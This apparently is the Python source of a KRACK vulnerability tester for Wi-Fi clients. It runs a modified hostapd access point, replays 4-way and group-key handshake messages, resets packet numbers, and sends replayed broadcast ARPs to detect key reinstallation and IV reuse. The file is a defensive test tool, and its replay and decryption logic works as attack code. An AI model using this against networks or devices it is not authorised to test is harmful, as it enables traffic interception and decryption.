krack-test-client.py 26 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628
  1. #!/usr/bin/env python3
  2. # Tests for key reinstallation vulnerabilities in Wi-Fi clients
  3. # Copyright (c) 2017-2021, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  4. #
  5. # This code may be distributed under the terms of the BSD license.
  6. # See README for more details.
  7. import logging
  8. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  9. from scapy.all import *
  10. import libwifi
  11. from libwifi import *
  12. import sys, socket, struct, time, subprocess, atexit, select, os.path
  13. from wpaspy import Ctrl
  14. # Concrete TODOs:
  15. # 0. Option to send plaintext retransmissions of message 3 (this is now easy to do)
  16. # 1. More reliable group key high RSC installation test in the 4-way HS (see below)
  17. # 2. Test for unicast replay protection
  18. # 3. Retransmit the handshake messages?
  19. # 4. --group --gtkinit is a bit unreliable. Perhaps due to race condition between
  20. # install the group key and sending the broadcast ARP request?
  21. # 5. How are we sure the broadcast ARP indeed using a PN=1? We should monitor
  22. # this interface and throw an error if there is other traffic!
  23. # TODOs:
  24. # - Always mention 4-way handshake attack test (normal, tptk, tptk-rand)
  25. # - Stop testing a client even when we think it's patched?
  26. # - The --gtkinit with the 4-way handshake is very sensitive to packet loss
  27. # - Add an option to test replays of unicast traffic
  28. # - Also send replayed broadcast using a PN of 2 to avoid edge cases where
  29. # the client may always reject PNs of zero or 1.
  30. # Futute work:
  31. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  32. # - Automatically execute all relevant tests in order
  33. # - Force client to request a new IP address when connecting
  34. # - More reliable group key reinstall test: install very high RSC, then install a zero one.
  35. # This avoids constantly having to execute a new 4-way handshake for example.
  36. # After how many seconds a new message 3, or new group key message 1, is sent.
  37. HANDSHAKE_TRANSMIT_INTERVAL = 2
  38. #### Utility Commands ####
  39. def hostapd_clear_messages(hostapd_ctrl):
  40. # Clear old replies and messages from the hostapd control interface
  41. while hostapd_ctrl.pending():
  42. hostapd_ctrl.recv()
  43. def hostapd_command(hostapd_ctrl, cmd):
  44. hostapd_clear_messages(hostapd_ctrl)
  45. rval = hostapd_ctrl.request(cmd)
  46. if "UNKNOWN COMMAND" in rval:
  47. log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
  48. quit(1)
  49. elif "FAIL" in rval:
  50. log(ERROR, "Failed to execute command %s" % cmd)
  51. quit(1)
  52. return rval
  53. #### Main Testing Code ####
  54. class TestOptions():
  55. ReplayBroadcast, ReplayUnicast, Fourway, Grouphs = range(4)
  56. TptkNone, TptkReplay, TptkRand = range(3)
  57. def __init__(self, variant=Fourway):
  58. self.variant = variant
  59. # Additional options for Fourway tests
  60. self.tptk = TestOptions.TptkNone
  61. # Extra option for Fourway and Grouphs tests
  62. self.gtkinit = False
  63. class ClientState():
  64. UNKNOWN, VULNERABLE, PATCHED = range(3)
  65. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  66. def __init__(self, clientmac, options):
  67. self.mac = clientmac
  68. self.options = options
  69. self.TK = None
  70. self.vuln_4way = ClientState.UNKNOWN
  71. self.vuln_bcast = ClientState.UNKNOWN
  72. self.ivs = IvCollection()
  73. self.pairkey_sent_time_prev_iv = None
  74. self.pairkey_intervals_no_iv_reuse = 0
  75. self.broadcast_reset()
  76. def broadcast_reset(self):
  77. self.broadcast_state = ClientState.IDLE
  78. self.broadcast_prev_canary_time = 0
  79. self.broadcast_num_canaries_received = -1 # -1 because the first broadcast ARP requests are still valid
  80. self.broadcast_requests_sent = -1 # -1 because the first broadcast ARP requests are still valid
  81. self.broadcast_patched_intervals = 0
  82. def get_encryption_key(self, hostapd_ctrl):
  83. if self.TK is None:
  84. # Contact our modified Hostapd instance to request the pairwise key
  85. response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
  86. if not "FAIL" in response:
  87. self.TK = bytes.fromhex(response.strip())
  88. return self.TK
  89. def decrypt(self, p, hostapd_ctrl):
  90. payload = get_ccmp_payload(p)
  91. if payload.startswith(b"\xAA\xAA\x03\x00\x00\x00"):
  92. # On some kernels, the virtual interface associated to the real AP interface will return
  93. # frames where the payload is already decrypted (this happens when hardware decryption is
  94. # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
  95. plaintext = LLC(payload)
  96. else:
  97. key = self.get_encryption_key(hostapd_ctrl)
  98. plaintext = decrypt_ccmp(p, key)
  99. # If it still fails, try an all-zero key
  100. if plaintext == None:
  101. plaintext = decrypt_ccmp(p, b"\x00" * 16)
  102. # No need for the whole packet, just the plaintext payload
  103. if plaintext != None:
  104. plaintext = plaintext[LLC]
  105. return plaintext
  106. def track_used_iv(self, p):
  107. return self.ivs.track_used_iv(p)
  108. def is_iv_reused(self, p):
  109. return self.ivs.is_iv_reused(p)
  110. def check_pairwise_reinstall(self, p):
  111. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  112. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  113. if self.ivs.is_iv_reused(p):
  114. if self.vuln_4way != ClientState.VULNERABLE:
  115. iv = dot11_get_iv(p)
  116. seq = dot11_get_seqnum(p)
  117. log(WARNING, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  118. "Client reinstalls the pairwise key in the 4-way handshake (this is bad)") % (self.mac, iv, seq))
  119. self.vuln_4way = ClientState.VULNERABLE
  120. # If it's a higher IV than all previous ones, try to check if the client seems patched
  121. elif self.vuln_4way == ClientState.UNKNOWN and self.ivs.is_new_iv(p):
  122. # Save how many intervals we received a data packet without IV reset. Use twice the
  123. # transmission interval of message 3, in case one message 3 is lost due to noise.
  124. if self.pairkey_sent_time_prev_iv is None:
  125. self.pairkey_sent_time_prev_iv = p.time
  126. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  127. self.pairkey_intervals_no_iv_reuse += 1
  128. self.pairkey_sent_time_prev_iv = p.time
  129. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  130. # If during several intervals all IV reset attempts failed, the client is likely patched.
  131. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  132. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  133. self.vuln_4way = ClientState.PATCHED
  134. # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
  135. msg = "%s: client DOESN'T reinstall the pairwise key in the 4-way handshake (this is good)"
  136. if self.options.tptk == TestOptions.TptkNone:
  137. msg += " (used standard attack)"
  138. elif self.options.tptk == TestOptions.TptkReplay:
  139. msg += " (used TPTK attack)"
  140. elif self.options.tptk == TestOptions.TptkRand:
  141. msg += " (used TPTK-RAND attack)"
  142. log(INFO, (msg + ".") % self.mac, color="green")
  143. def mark_allzero_key(self, p):
  144. if self.vuln_4way != ClientState.VULNERABLE:
  145. iv = dot11_get_iv(p)
  146. seq = dot11_get_seqnum(p)
  147. log(WARNING, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
  148. "Client (re)installs an all-zero key in the 4-way handshake (this is very bad).") % (self.mac, iv, seq))
  149. log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this vulnerability first !!!" % self.mac, color="red")
  150. self.vuln_4way = ClientState.VULNERABLE
  151. def broadcast_print_patched(self):
  152. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs]:
  153. # TODO: Mention which variant of the 4-way handshake test was used
  154. hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
  155. if self.options.gtkinit:
  156. log(INFO, "%s: Client installs the group key in the %s handshake with the given replay counter (this is good)" % (self.mac, hstype), color="green")
  157. else:
  158. log(INFO, "%s: Client DOESN'T reinstall the group key in the %s handshake (this is good)" % (self.mac, hstype), color="green")
  159. if self.options.variant == TestOptions.ReplayBroadcast:
  160. log(INFO, "%s: Client DOESN'T accept replayed broadcast frames (this is good)" % self.mac, color="green")
  161. def broadcast_print_vulnerable(self):
  162. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs]:
  163. hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
  164. if self.options.gtkinit:
  165. log(WARNING, "%s: Client always installs the group key in the %s handshake with a zero replay counter (this is bad)." % (self.mac, hstype))
  166. else:
  167. log(WARNING, "%s: Client reinstalls the group key in the %s handshake (this is bad)." % (self.mac, hstype))
  168. log(WARNING, " Or client accepts replayed broadcast frames (see --replay-broadcast).")
  169. if self.options.variant == TestOptions.ReplayBroadcast:
  170. log(WARNING, "%s: Client accepts replayed broadcast frames (this is bad)." % self.mac)
  171. log(WARNING, " Fix this before testing for group key (re)installations!")
  172. def broadcast_process_reply(self, p):
  173. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  174. # Must be testing this client, and must not be a benign retransmission
  175. if not self.broadcast_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  176. if self.broadcast_prev_canary_time + 1 > p.time: return
  177. self.broadcast_num_canaries_received += 1
  178. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.broadcast_num_canaries_received))
  179. # We wait for several replies before marking the client as vulnerable, because
  180. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  181. if self.broadcast_num_canaries_received >= 5:
  182. assert self.vuln_bcast != ClientState.VULNERABLE
  183. self.vuln_bcast = ClientState.VULNERABLE
  184. self.broadcast_state = ClientState.FINISHED
  185. self.broadcast_print_vulnerable()
  186. # Remember that we got a reply this interval (see broadcast_check_replies to detect patched clients)
  187. else:
  188. self.broadcast_state = ClientState.GOT_CANARY
  189. self.broadcast_prev_canary_time = p.time
  190. def broadcast_check_replies(self):
  191. """Track when we send broadcast ARP requests, and determine if a client seems patched"""
  192. if self.broadcast_state == ClientState.IDLE:
  193. return
  194. if self.broadcast_requests_sent == 4:
  195. # We sent four broadcast ARP requests, and got at least one got a reply. This indicates the client is vulnerable.
  196. if self.broadcast_state == ClientState.GOT_CANARY:
  197. log(DEBUG, "%s: got a reply to broadcast ARPs during this interval" % self.mac)
  198. self.broadcast_state = ClientState.STARTED
  199. # We sent four broadcast ARP requests, and didn't get a reply to any. This indicates the client is patched.
  200. elif self.broadcast_state == ClientState.STARTED:
  201. self.broadcast_patched_intervals += 1
  202. log(DEBUG, "%s: didn't get reply received to broadcast ARPs during this interval" % self.mac)
  203. self.broadcast_state = ClientState.STARTED
  204. self.broadcast_requests_sent = 0
  205. # If the client appears secure for several intervals (see above), it's likely patched
  206. if self.broadcast_patched_intervals >= 5 and self.vuln_bcast == ClientState.UNKNOWN:
  207. self.vuln_bcast = ClientState.PATCHED
  208. self.broadcast_state = ClientState.FINISHED
  209. self.broadcast_print_patched()
  210. class KRAckAttackClient():
  211. def __init__(self):
  212. # Parse hostapd.conf
  213. self.script_path = os.path.dirname(os.path.realpath(__file__))
  214. try:
  215. interface = hostapd_read_config(os.path.join(self.script_path, "hostapd.conf"))
  216. except Exception as ex:
  217. log(ERROR, "Failed to parse the hostapd.conf config file")
  218. raise
  219. if not interface:
  220. log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
  221. quit(1)
  222. # Set other variables
  223. self.nic_iface = interface
  224. self.nic_mon = ("mon" + interface)[:15]
  225. self.options = None
  226. try:
  227. self.apmac = scapy.arch.get_if_hwaddr(interface)
  228. except:
  229. log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
  230. raise
  231. self.sock_mon = None
  232. self.sock_eth = None
  233. self.hostapd = None
  234. self.hostapd_ctrl = None
  235. self.dhcp = None
  236. self.broadcast_sender_ip = None
  237. self.broadcast_arp_sock = None
  238. self.clients = dict()
  239. def reset_client_info(self, clientmac):
  240. if clientmac in self.dhcp.leases:
  241. self.dhcp.remove_client(clientmac)
  242. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  243. if clientmac in self.clients:
  244. del self.clients[clientmac]
  245. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  246. def handle_replay(self, p):
  247. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  248. function processes these frames manually so we can still test reinstallations of the group key."""
  249. if not dot11_is_encrypted_data(p): return
  250. # Reconstruct Ethernet header
  251. clientmac = p.addr2
  252. header = Ether(dst=self.apmac, src=clientmac)
  253. header.time = p.time
  254. # Decrypt the Wi-Fi frame
  255. client = self.clients[clientmac]
  256. plaintext = client.decrypt(p, self.hostapd_ctrl)
  257. if plaintext == None:
  258. return
  259. if not SNAP in plaintext:
  260. log(WARNING, f"No SNAP layer in decrypted packet {plaintext}")
  261. return None
  262. # Now process the packet as if it were a valid (non-replayed) one
  263. decap = header/plaintext[SNAP].payload
  264. self.process_eth_rx(decap)
  265. def handle_mon_rx(self):
  266. p = self.sock_mon.recv()
  267. if p == None: return
  268. if p.type == 1: return
  269. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  270. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  271. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  272. # The first bit in FCfield is set if the frames is "to-DS"
  273. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  274. if apmac != self.apmac: return None
  275. # Reset info about disconnected clients
  276. if Dot11AssoReq in p or Dot11Deauth in p or Dot11Disas in p:
  277. self.reset_client_info(clientmac)
  278. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  279. elif p.addr1 == self.apmac and dot11_is_encrypted_data(p):
  280. if not clientmac in self.clients:
  281. self.clients[clientmac] = ClientState(clientmac, options=options)
  282. client = self.clients[clientmac]
  283. iv = dot11_get_iv(p)
  284. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  285. if decrypt_ccmp(p, b"\x00" * 16) != None:
  286. client.mark_allzero_key(p)
  287. if self.options.variant == TestOptions.Fourway and not self.options.gtkinit:
  288. client.check_pairwise_reinstall(p)
  289. if client.is_iv_reused(p):
  290. self.handle_replay(p)
  291. client.track_used_iv(p)
  292. def process_eth_rx(self, p):
  293. self.dhcp.reply(p)
  294. self.broadcast_arp_sock.reply(p)
  295. clientmac = p[Ether].src
  296. if not clientmac in self.clients: return
  297. client = self.clients[clientmac]
  298. if ARP in p and p[ARP].pdst == self.broadcast_sender_ip:
  299. client.broadcast_process_reply(p)
  300. def handle_eth_rx(self):
  301. p = self.sock_eth.recv()
  302. if p == None or not Ether in p: return
  303. self.process_eth_rx(p)
  304. def broadcast_send_request(self, client):
  305. clientip = self.dhcp.leases[client.mac]
  306. # Print a message when we start testing the client --- XXX this should be in the client?
  307. if client.broadcast_state == ClientState.IDLE:
  308. hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
  309. log(STATUS, "%s: client has IP address -> now sending replayed broadcast ARP packets" % client.mac)
  310. client.broadcast_state = ClientState.STARTED
  311. # Send a new handshake message when testing the group key handshake
  312. if self.options.variant == TestOptions.Grouphs:
  313. cmd = "RESEND_GROUP_M1 " + client.mac
  314. cmd += "maxrsc" if self.options.gtkinit else ""
  315. hostapd_command(self.hostapd_ctrl, cmd)
  316. # Send a replayed broadcast ARP request to the client
  317. request = Ether(src=self.apmac, dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.broadcast_sender_ip, pdst=clientip)
  318. self.sock_eth.send(request)
  319. client.broadcast_requests_sent += 1
  320. log(INFO, "%s: sending broadcast ARP to %s from %s (sent %d ARPs this interval)" % (client.mac,
  321. clientip, self.broadcast_sender_ip, client.broadcast_requests_sent))
  322. def experimental_test_igtk_installation(self):
  323. """To test if the IGTK is installed using the given replay counter"""
  324. # 1. Set ieee80211w=2 in hostapd.conf
  325. # 2. Run this script using --gtkinit so a new group key is generated before calling this function
  326. # 3. Install the new IGTK using a very high given replay counter
  327. hostapd_command(self.hostapd_ctrl, "RESEND_GROUP_M1 %s maxrsc" % client.mac)
  328. time.sleep(1)
  329. # 4. Now kill the AP
  330. quit(1)
  331. # 5. Hostapd sends a broadcast deauth message. At least iOS will reply using its own
  332. # deauthentication respose if this frame is accepted. Sometimes hostapd doesn't
  333. # send a broadcast deauthentication. Is this when the client is sleeping?
  334. def configure_interfaces(self):
  335. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  336. # 0. Some users may forget this otherwise
  337. subprocess.check_output(["rfkill", "unblock", "wifi"])
  338. # 1. Remove unused virtual interfaces to start from a clean state
  339. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  340. # 2. Configure monitor mode on interfaces
  341. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  342. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  343. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  344. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  345. time.sleep(0.5)
  346. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  347. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  348. def run(self, options):
  349. self.options = options
  350. self.configure_interfaces()
  351. # Open the patched hostapd instance that carries out tests and let it start
  352. log(STATUS, "Starting hostapd ...")
  353. try:
  354. self.hostapd = subprocess.Popen([
  355. os.path.join(self.script_path, "../hostapd/hostapd"),
  356. os.path.join(self.script_path, "hostapd.conf")]
  357. + sys.argv[1:])
  358. except:
  359. if not os.path.exists("../hostapd/hostapd"):
  360. log(ERROR, "hostapd executable not found. Did you compile hostapd? Use --help param for more info.")
  361. raise
  362. time.sleep(1)
  363. try:
  364. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  365. self.hostapd_ctrl.attach()
  366. except:
  367. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  368. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  369. raise
  370. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  371. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  372. # Let scapy handle DHCP requests
  373. self.dhcp = DHCP_sock(sock=self.sock_eth,
  374. domain='krackattack.com',
  375. pool=Net('192.168.100.0/24'),
  376. network='192.168.100.0/24',
  377. gw='192.168.100.254',
  378. renewal_time=600, lease_time=3600)
  379. # Configure gateway IP: reply to ARP and ping requests
  380. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  381. # Use a dedicated IP address for our broadcast ARP requests and replies
  382. self.broadcast_sender_ip = self.dhcp.pool.pop()
  383. self.broadcast_arp_sock = ARP_sock(sock=self.sock_eth, IP_addr=self.broadcast_sender_ip, ARP_addr=self.apmac)
  384. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  385. # Monitor both the normal interface and virtual monitor interface of the AP
  386. self.next_arp = time.time() + 1
  387. while True:
  388. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  389. if self.sock_mon in sel[0]: self.handle_mon_rx()
  390. if self.sock_eth in sel[0]: self.handle_eth_rx()
  391. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  392. if time.time() > self.next_arp:
  393. # When testing if the replay counter of the group key is properly installed, always install
  394. # a new group key. Otherwise KRACK patches might interfere with this test.
  395. # Otherwise just reset the replay counter of the current group key.
  396. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs] and self.options.gtkinit:
  397. hostapd_command(self.hostapd_ctrl, "RENEW_GTK")
  398. else:
  399. hostapd_command(self.hostapd_ctrl, "RESET_PN FF:FF:FF:FF:FF:FF")
  400. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  401. for client in self.clients.values():
  402. #self.experimental_test_igtk_installation()
  403. # 1. Test the 4-way handshake
  404. if self.options.variant == TestOptions.Fourway and self.options.gtkinit and client.vuln_bcast != ClientState.VULNERABLE:
  405. # Execute a new handshake to test stations that don't accept a retransmitted message 3
  406. hostapd_command(self.hostapd_ctrl, "RENEW_PTK " + client.mac)
  407. # TODO: wait untill 4-way handshake completed? And detect failures (it's sensitive to frame losses)?
  408. elif self.options.variant == TestOptions.Fourway and not self.options.gtkinit and client.vuln_4way != ClientState.VULNERABLE:
  409. # First inject a message 1 if requested using the TPTK option
  410. if self.options.tptk == TestOptions.TptkReplay:
  411. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac)
  412. elif self.options.tptk == TestOptions.TptkRand:
  413. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac + " change-anonce")
  414. # Note that we rely on an encrypted message 4 as reply to detect pairwise key reinstallations reinstallations.
  415. hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac + (" maxrsc" if self.options.gtkinit else ""))
  416. # 2. Test if broadcast ARP request are accepted by the client. Keep injecting even
  417. # to PATCHED clients (just to be sure they keep rejecting replayed frames).
  418. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs, TestOptions.ReplayBroadcast]:
  419. # 2a. Check if we got replies to previous requests (and determine if vulnerable)
  420. client.broadcast_check_replies()
  421. # 2b. Send new broadcast ARP requests (and handshake messages if needed)
  422. if client.vuln_bcast != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  423. time.sleep(1)
  424. self.broadcast_send_request(client)
  425. def stop(self):
  426. log(STATUS, "Closing hostapd and cleaning up ...")
  427. if self.hostapd:
  428. self.hostapd.terminate()
  429. self.hostapd.wait()
  430. if self.sock_mon: self.sock_mon.close()
  431. if self.sock_eth: self.sock_eth.close()
  432. def cleanup():
  433. attack.stop()
  434. def argv_get_interface():
  435. for i in range(len(sys.argv)):
  436. if not sys.argv[i].startswith("-i"):
  437. continue
  438. if len(sys.argv[i]) > 2:
  439. return sys.argv[i][2:]
  440. else:
  441. return sys.argv[i + 1]
  442. return None
  443. def argv_pop_argument(argument):
  444. if not argument in sys.argv: return False
  445. idx = sys.argv.index(argument)
  446. del sys.argv[idx]
  447. return True
  448. def hostapd_read_config(config):
  449. # Read the config, get the interface name, and verify some settings.
  450. interface = None
  451. with open(config) as fp:
  452. for line in fp.readlines():
  453. line = line.strip()
  454. if line.startswith("interface="):
  455. interface = line.split('=')[1]
  456. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  457. if "TKIP" in line:
  458. log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
  459. log(ERROR, " >%s<" % line, showtime=False)
  460. quit(1)
  461. # Parameter -i overrides interface in config.
  462. # FIXME: Display warning when multiple interfaces are used.
  463. if argv_get_interface() is not None:
  464. interface = argv_get_interface()
  465. return interface
  466. def get_expected_scapy_ver():
  467. for line in open("requirements.txt"):
  468. if line.startswith("scapy=="):
  469. return line[7:].strip()
  470. return None
  471. if __name__ == "__main__":
  472. if "--help" in sys.argv or "-h" in sys.argv:
  473. print("\nSee README.md for usage instructions. Accepted parameters are")
  474. print("\n\t" + "\n\t".join(["--replay-broadcast", "--group", "--tptk", "--tptk-rand", "--gtkinit", "--debug"]) + "\n")
  475. quit(1)
  476. # Check if we're using the expected scapy version
  477. expected_ver = get_expected_scapy_ver()
  478. if expected_ver!= None and scapy.VERSION != expected_ver:
  479. log(WARNING, f"You are using scapy version {scapy.VERSION} instead of the expected {expected_ver}")
  480. log(WARNING, "Are you executing the script from inside the correct python virtual environment?")
  481. options = TestOptions()
  482. # Parse the type of test variant to execute
  483. replay_broadcast = argv_pop_argument("--replay-broadcast")
  484. replay_unicast = argv_pop_argument("--replay-unicast")
  485. groupkey = argv_pop_argument("--group")
  486. fourway = argv_pop_argument("--fourway")
  487. if replay_broadcast + replay_unicast + fourway + groupkey > 1:
  488. print("You can only select one argument of out replay-broadcast, replay-unicast, fourway, and group")
  489. quit(1)
  490. if replay_broadcast:
  491. options.variant = TestOptions.ReplayBroadcast
  492. elif replay_unicast:
  493. options.variant = TestOptions.ReplayUnicast
  494. elif groupkey:
  495. options.variant = TestOptions.Grouphs
  496. else:
  497. options.variant = TestOptions.Fourway
  498. # Parse options for the 4-way handshake
  499. tptk = argv_pop_argument("--tptk")
  500. tptk_rand = argv_pop_argument("--tptk-rand")
  501. if tptk + tptk_rand > 1:
  502. print("You can only select one argument of out tptk and tptk-rand")
  503. quit(1)
  504. if tptk:
  505. options.tptk = TestOptions.TptkReplay
  506. elif tptk_rand:
  507. options.tptk = TestOptions.TptkRand
  508. else:
  509. options.tptk = TestOptions.TptkNone
  510. # Parse remaining options
  511. options.gtkinit = argv_pop_argument("--gtkinit")
  512. while argv_pop_argument("--debug"):
  513. libwifi.global_log_level -= 1
  514. # Now start the tests
  515. attack = KRAckAttackClient()
  516. atexit.register(cleanup)
  517. attack.run(options=options)